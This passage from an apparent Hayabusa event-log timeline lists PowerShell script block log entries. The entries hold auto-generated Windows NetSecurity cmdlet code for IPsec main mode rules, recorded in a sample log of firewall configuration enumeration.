[string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 